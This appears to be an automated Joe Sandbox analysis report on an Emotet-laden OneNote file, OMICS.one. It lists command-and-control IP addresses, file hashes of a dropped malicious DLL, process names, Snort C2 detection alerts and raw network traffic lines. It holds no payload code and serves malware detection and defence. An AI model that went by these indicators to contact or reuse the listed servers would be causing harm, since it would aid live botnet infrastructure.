                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
110.232.117.186 | unknown | Australia | 56038 | RACKCORP-APRackCorpAU | true
103.132.242.26 | unknown | India | 45117 | INPL-IN-APIshansNetworkIN | true
104.168.155.143 | unknown | United States | 54290 | HOSTWINDSUS | true
79.137.35.198 | unknown | France | 16276 | OVHFR | true
115.68.227.76 | unknown | Korea Republic of | 38700 | SMILESERV-AS-KRSMILESERVKR | true
163.44.196.120 | unknown | Singapore | 135161 | GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | true
206.189.28.199 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
203.26.41.131 | penshorn.org | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true
107.170.39.149 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
66.228.32.31 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
197.242.150.244 | unknown | South Africa | 37611 | AfrihostZA | true
185.4.135.165 | unknown | Greece | 199246 | TOPHOSTGR | true
183.111.227.137 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true
45.176.232.124 | unknown | Colombia | 267869 | CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC | true
169.57.156.166 | unknown | United States | 36351 | SOFTLAYERUS | true
164.68.99.3 | unknown | Germany | 51167 | CONTABODE | true
139.59.126.41 | unknown | Singapore | 14061 | DIGITALOCEAN-ASNUS | true
167.172.253.162 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
167.172.199.165 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
202.129.205.3 | unknown | Thailand | 45328 | NIPA-AS-THNIPATECHNOLOGYCOLTDTH | true
147.139.166.154 | unknown | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
153.92.5.27 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
159.65.88.10 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
172.105.226.75 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
164.90.222.65 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
213.239.212.5 | unknown | Germany | 24940 | HETZNER-ASDE | true
5.135.159.50 | unknown | France | 16276 | OVHFR | true
186.194.240.217 | unknown | Brazil | 262733 | NetceteraTelecomunicacoesLtdaBR | true
119.59.103.152 | unknown | Thailand | 56067 | METRABYTE-TH453LadplacoutJorakhaebuaTH | true
159.89.202.34 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
91.121.146.47 | unknown | France | 16276 | OVHFR | true
160.16.142.56 | unknown | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
201.94.166.162 | unknown | Brazil | 28573 | CLAROSABR | true
91.207.28.33 | unknown | Kyrgyzstan | 39819 | PROHOSTKG | true
103.75.201.2 | unknown | Thailand | 133496 | CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH | true
103.43.75.120 | unknown | Japan | 20473 | AS-CHOOPAUS | true
188.44.20.25 | unknown | Macedonia | 57374 | GIV-ASMK | true
45.235.8.30 | unknown | Brazil | 267405 | WIKINETTELECOMUNICACOESBR | true
153.126.146.25 | unknown | Japan | 7684 | SAKURA-ASAKURAInternetIncJP | true
72.15.201.15 | unknown | United States | 13649 | ASN-VINSUS | true
187.63.160.88 | unknown | Brazil | 28169 | BITCOMPROVEDORDESERVICOSDEINTERNETLTDABR | true
82.223.21.224 | unknown | Spain | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
173.212.193.249 | unknown | Germany | 51167 | CONTABODE | true
95.217.221.146 | unknown | Germany | 24940 | HETZNER-ASDE | true
149.56.131.28 | unknown | Canada | 16276 | OVHFR | true
182.162.143.56 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true
1.234.2.232 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
129.232.188.93 | unknown | South Africa | 37153 | xneeloZA | true
94.23.45.86 | unknown | France | 16276 | OVHFR | true
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 828486
Start date and time: 2023-03-17 09:04:56 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: OMICS.one
Detection: MAL
Classification: mal100.troj.expl.evad.winONE@9/11@1/49
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 50.2% (good quality ratio 42.4%)
• Quality average: 60.5%
• Quality standard deviation: 35.6%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 19
• Number of non-executed functions: 136
Cookbook Comments:
• Found application associated with file extension: .one
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 209.197.3.8
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
09:06:37 | API Interceptor | 2x Sleep call for process: wscript.exe modified
09:07:14 | API Interceptor | 10x Sleep call for process: regsvr32.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                110.232.117.186OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                  OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                    OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                      Opast_International.oneGet hashmaliciousEmotetBrowse
                        opastonline.com.oneGet hashmaliciousEmotetBrowse
                          Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                            Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                              omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                  2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                    report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                      100935929722734787.oneGet hashmaliciousEmotetBrowse
                                        NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                          2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                            PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse
                                              355444649229343017.oneGet hashmaliciousEmotetBrowse
                                                2961883463791890566.oneGet hashmaliciousEmotetBrowse
                                                  1002112025749539431938.oneGet hashmaliciousEmotetBrowse
                                                    Dokumente_2023.16.03_1155.oneGet hashmaliciousEmotetBrowse
                                                      Keith_Pierson_Toyota.oneGet hashmaliciousEmotetBrowse
Match: penshorn.org
Associated Sample Name / URL | Detection | Threat Name | Context
OPAST_GROUP_1.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP_LLC.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP.one | malicious | Emotet | 203.26.41.131
Opast_International.one | malicious | Emotet | 203.26.41.131
opastonline.com.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group_1.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group.one | malicious | Emotet | 203.26.41.131
omicsonline.net.one | malicious | Emotet | 203.26.41.131
report_03_16_2023.one | malicious | Emotet | 203.26.41.131
2023-03-16_0923.one | malicious | Emotet | 203.26.41.131
report_03_16_2023.one | malicious | Emotet | 203.26.41.131
100935929722734787.one | malicious | Emotet | 203.26.41.131
NG7553084292252526_202303161746.one | malicious | Emotet | 203.26.41.131
2023-03-16_1753.one | malicious | Emotet | 203.26.41.131
PUV026949243199756981_202303161748.one | malicious | Emotet | 203.26.41.131
355444649229343017.one | malicious | Emotet | 203.26.41.131
2961883463791890566.one | malicious | Emotet | 203.26.41.131
1002112025749539431938.one | malicious | Emotet | 203.26.41.131
Dokumente_2023.16.03_1155.one | malicious | Emotet | 203.26.41.131
Keith_Pierson_Toyota.one | malicious | Emotet | 203.26.41.131
Match: RACKCORP-AP RackCorp AU
Associated Sample Name / URL | Detection | Threat Name | Context
OPAST_GROUP_1.one | malicious | Emotet | 110.232.117.186
OPAST_GROUP_LLC.one | malicious | Emotet | 110.232.117.186
OPAST_GROUP.one | malicious | Emotet | 110.232.117.186
Opast_International.one | malicious | Emotet | 110.232.117.186
opastonline.com.one | malicious | Emotet | 110.232.117.186
Opast_Publishing_Group_1.one | malicious | Emotet | 110.232.117.186
Opast_Publishing_Group.one | malicious | Emotet | 110.232.117.186
omicsonline.net.one | malicious | Emotet | 110.232.117.186
report_03_16_2023.one | malicious | Emotet | 110.232.117.186
2023-03-16_0923.one | malicious | Emotet | 110.232.117.186
report_03_16_2023.one | malicious | Emotet | 110.232.117.186
100935929722734787.one | malicious | Emotet | 110.232.117.186
NG7553084292252526_202303161746.one | malicious | Emotet | 110.232.117.186
2023-03-16_1753.one | malicious | Emotet | 110.232.117.186
PUV026949243199756981_202303161748.one | malicious | Emotet | 110.232.117.186
355444649229343017.one | malicious | Emotet | 110.232.117.186
2961883463791890566.one | malicious | Emotet | 110.232.117.186
1002112025749539431938.one | malicious | Emotet | 110.232.117.186
Dokumente_2023.16.03_1155.one | malicious | Emotet | 110.232.117.186
Keith_Pierson_Toyota.one | malicious | Emotet | 110.232.117.186
Match: ce5f3254611a8c095a3d821d44539877
Associated Sample Name / URL | Detection | Threat Name | Context
OPAST_GROUP_1.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP_LLC.one | malicious | Emotet | 203.26.41.131
OPAST_GROUP.one | malicious | Emotet | 203.26.41.131
Opast_International.one | malicious | Emotet | 203.26.41.131
opastonline.com.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group_1.one | malicious | Emotet | 203.26.41.131
Opast_Publishing_Group.one | malicious | Emotet | 203.26.41.131
omicsonline.net.one | malicious | Emotet | 203.26.41.131
aRThcK3rSO.exe | malicious | Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader | 203.26.41.131
click.wsf | malicious | Emotet | 203.26.41.131
setup.exe | malicious | Amadey, Djvu, RedLine, SmokeLoader | 203.26.41.131
purchase_order.exe | malicious | BluStealer, ThunderFox Stealer, a310Logger | 203.26.41.131
file.exe | malicious | Amadey, Djvu, SmokeLoader | 203.26.41.131
setup.exe | malicious | SmokeLoader | 203.26.41.131
it2NFpv2yt.exe | malicious | SmokeLoader | 203.26.41.131
file.exe | malicious | SmokeLoader | 203.26.41.131
report_03_16_2023.one | malicious | Emotet | 203.26.41.131
2023-03-16_0923.one | malicious | Emotet | 203.26.41.131
untitled_764875647.one | malicious | Emotet | 203.26.41.131
report_03_16_2023.one | malicious | Emotet | 203.26.41.131
Match: C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll
Associated Sample Name / URL | Detection | Threat Name
OPAST_GROUP_1.one | malicious | Emotet
OPAST_GROUP_LLC.one | malicious | Emotet
OPAST_GROUP.one | malicious | Emotet
Opast_International.one | malicious | Emotet
opastonline.com.one | malicious | Emotet
Opast_Publishing_Group_1.one | malicious | Emotet
Opast_Publishing_Group.one | malicious | Emotet
omicsonline.net.one | malicious | Emotet
report_03_16_2023.one | malicious | Emotet
2023-03-16_0923.one | malicious | Emotet
report_03_16_2023.one | malicious | Emotet
100935929722734787.one | malicious | Emotet
NG7553084292252526_202303161746.one | malicious | Emotet
2023-03-16_1753.one | malicious | Emotet
PUV026949243199756981_202303161748.one | malicious | Emotet
355444649229343017.one | malicious | Emotet
2961883463791890566.one | malicious | Emotet
1002112025749539431938.one | malicious | Emotet
Dokumente_2023.16.03_1155.one | malicious | Emotet
Keith_Pierson_Toyota.one | malicious | Emotet
                                                                                                Process:C:\Windows\System32\regsvr32.exe
                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                Category:dropped
                                                                                                Size (bytes):62582
                                                                                                Entropy (8bit):7.996063107774368
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                                MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                                SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                                SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Process:C:\Windows\System32\regsvr32.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):328
                                                                                                Entropy (8bit):3.119038565051529
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:kKw4ry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:YwCvkPlE99SNxAhUext
                                                                                                MD5:B30D7FE50A8160A98B64722BDC09395D
                                                                                                SHA1:0698124C2D76A2CAD650C776812B979ACBFF00EA
                                                                                                SHA-256:6392F698AF772CFD6F70524336CD19571B93B432AD7566A3FEFA06806B48B15F
                                                                                                SHA-512:81FDA26F02D122F617031929842AD5F73326E535EE9AAB263DE6BDB28C354F7F31D3AF6622F77C51C558E85130E8DB59721694738FCE351164089FCFBE3C652C
                                                                                                Malicious:false
                                                                                                Preview:p...... ...........z.X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \340\004, numeric, rows 262223750, columns 0
                                                                                                Category:dropped
                                                                                                Size (bytes):72
                                                                                                Entropy (8bit):2.106463217645438
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ulXH+lS8TcRaAqlAaRtl:KelS8Tc8TX
                                                                                                MD5:6D35FE979A2AF81158578D8FF8AA4390
                                                                                                SHA1:4FACFE5FFF9553E926FC82615BBFF18F47876715
                                                                                                SHA-256:41E5436CD2453FF8DC3D187CCC680CE58212D72C77CCA0E632B51085BDE7ECED
                                                                                                SHA-512:947226E35A9BEC0F93AE0467AC23DBE81EFC681A48F3FE6F49F70A2B0BDD35AB533165240D442C2492EA57D29CFA403B848FF8E9BB6EFEADAB507C12DEAE4CEE
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):0.7042826857143938
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:RDeyO9stKE+mpfrS7xuYNgUlLa+ZovySB89u9Nj8lW:RyiKWf1YaUk+Zovp93
                                                                                                MD5:F66C2BA29F0287A81763F5410AC29E16
                                                                                                SHA1:1B9FFB04B5C6D5FF4806A62F41335911937F80DA
                                                                                                SHA-256:631A516E9F0DB198866FB04D4E84417C2619B346471BEF9475A7F168B8728EFF
                                                                                                SHA-512:5B9DDA0C6D524193DA9F77220320CDAD8A7BBCB6A68FBB32C6EF4742100423351AC46DA478F5FF84313E7241607A91BBE7B45D81EBDAD29FE13CE69CDCDD33C6
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):9
                                                                                                Entropy (8bit):2.94770277922009
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:tWn:tWn
                                                                                                MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                Malicious:true
                                                                                                Preview:badum tss
                                                                                                Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):316928
                                                                                                Entropy (8bit):7.337848702590508
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                                • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                                • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                                • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                                • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                                • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                                • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                                • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                                • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                • Filename: 2023-03-16_0923.one, Detection: malicious, Browse
                                                                                                • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                • Filename: 100935929722734787.one, Detection: malicious, Browse
                                                                                                • Filename: NG7553084292252526_202303161746.one, Detection: malicious, Browse
                                                                                                • Filename: 2023-03-16_1753.one, Detection: malicious, Browse
                                                                                                • Filename: PUV026949243199756981_202303161748.one, Detection: malicious, Browse
                                                                                                • Filename: 355444649229343017.one, Detection: malicious, Browse
                                                                                                • Filename: 2961883463791890566.one, Detection: malicious, Browse
                                                                                                • Filename: 1002112025749539431938.one, Detection: malicious, Browse
                                                                                                • Filename: Dokumente_2023.16.03_1155.one, Detection: malicious, Browse
                                                                                                • Filename: Keith_Pierson_Toyota.one, Detection: malicious, Browse
Process: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type: data
Category: dropped
Size (bytes): 25280
Entropy (8bit): 0.5434078989155284
Encrypted: false
SSDEEP: 48:ohnnY+YoO4OOUQPSf+9olgk8Z4GQTaza2yX:0xYocOT6f+6lAUaza26
MD5: 23F4BB1DEB1DB2981E5D6BCA9CEF3D0C
SHA1: 4EE22EF03915F90F11CA2A1638B053D4201773DC
SHA-256: 628359353E88E935B7A366ED1EB0E256B83ECF734D1145D749063FBACC309101
SHA-512: FF8E454166C94E19CD671DCFE77D05F9C9FAFAEAE12D1DC832EC90C95869CC157BF46748710B2AAE2B616F609851748C7CD603F8C1D0A31B472CC3EBDC90A006
Malicious: false
Process: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type: data
Category: dropped
Size (bytes): 3873
Entropy (8bit): 3.4802265775463828
Encrypted: false
SSDEEP: 48:j8m+cdO5bWDMIFPbqzqgdCDDGTCDc6pd5m+cdO5bWDMh7+5DGqzWk7dCDGWG5CDY:cTKDt0qfGF6p/TKD9LZhP3s4
MD5: 56FEFF26310788D7E507E757B170A3AA
SHA1: 39FD624DAC6F7BC24DFDED7BF4CBBC8BE1347057
SHA-256: 232CF6EF6DE876BB28B7BD4EB302D5A6B23D6AA2B1E7451677F3F93B84A4BD82
SHA-512: C17325AC363F1F63568315634F4D0C3D1957320A47276099D31726D78B3D464D6DBA210B21045D885D261FD1CF73874C65F9D6FC16F70DCCD6FB5C749CA002B8
Malicious: false
Process: C:\Windows\System32\regsvr32.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 316928
Entropy (8bit): 7.337848702590508
Encrypted: false
SSDEEP: 6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
MD5: BFC060937DC90B273ECCB6825145F298
SHA1: C156C00C7E918F0CB7363614FB1F177C90D8108A
SHA-256: 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
SHA-512: CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 58%
File type: data
Entropy (8bit): 6.73077865477405
TrID:
• Microsoft OneNote note (16024/2) 100.00%
File name: OMICS.one
File size: 120428
MD5: cee0905efea3357f3dc9902754e5d47a
SHA1: 693fdea99a495b339d8dd372b759f370cf7f1b7a
SHA256: d72079bdae7c59361f934bf92ec1a53875008113541db11124d167cc2eb69b32
SHA512: 9b6184b4a515ba6022982d691983f0108d750e01c9f3edef118b6b8aff66e21d6f510d4a31aded07da973a00049ad6d989eefd537f7b3e0f3cf1b9f1387ee42a
SSDEEP: 1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX9:1BoC+tCYvSMVnte8ZP1Y6Jt
TLSH: B6C33BF1A8025C0AE123C976B1FB661399D052ED42283B2BF87D507DD978A20D5DD8EF
Icon Hash: d4dce0626664606c
Snort IDS alerts (ET CNC Feodo Tracker signatures)

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/17/23-09:07:50.440401 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49696 | 8080 | 192.168.2.4 | 104.168.155.143
03/17/23-09:07:07.082827 | TCP | 2404344 | ET CNC Feodo Tracker Reported CnC Server TCP group 23 | 49686 | 8080 | 192.168.2.4 | 91.121.146.47
03/17/23-09:07:23.162928 | TCP | 2404312 | ET CNC Feodo Tracker Reported CnC Server TCP group 7 | 49689 | 443 | 192.168.2.4 | 182.162.143.56
03/17/23-09:07:17.980118 | TCP | 2404330 | ET CNC Feodo Tracker Reported CnC Server TCP group 16 | 49688 | 7080 | 192.168.2.4 | 66.228.32.31
03/17/23-09:07:36.723536 | TCP | 2404308 | ET CNC Feodo Tracker Reported CnC Server TCP group 5 | 49691 | 8080 | 192.168.2.4 | 167.172.199.165
                                                                                                Mar 17, 2023 09:06:26.175335884 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175364017 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175456047 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.175470114 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175741911 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175849915 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.175863981 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.175906897 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176029921 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176042080 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176156044 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176229000 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176253080 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176274061 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176301956 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176328897 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176418066 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176502943 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176508904 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176531076 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176603079 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176618099 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176703930 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176734924 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176748991 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176793098 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176803112 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176836014 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176847935 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176875114 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176908970 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.176917076 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.176939964 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177005053 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177006960 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177025080 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177084923 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177160025 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177225113 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177241087 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177253962 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177309036 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177388906 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177474976 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177486897 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177508116 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.177572012 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.177772999 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.179610968 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.179636002 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:26.179651976 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:26.179660082 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.082827091 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.112083912 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.112323046 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.137682915 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.166542053 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.184624910 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.184667110 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.184835911 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.193453074 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:07.222291946 CET80804968691.121.146.47192.168.2.4
                                                                                                Mar 17, 2023 09:07:07.263881922 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:13.351089001 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:13.351146936 CET496868080192.168.2.491.121.146.47
                                                                                                Mar 17, 2023 09:07:13.378634930 CET80804968691.121.146.47192.168.2.4
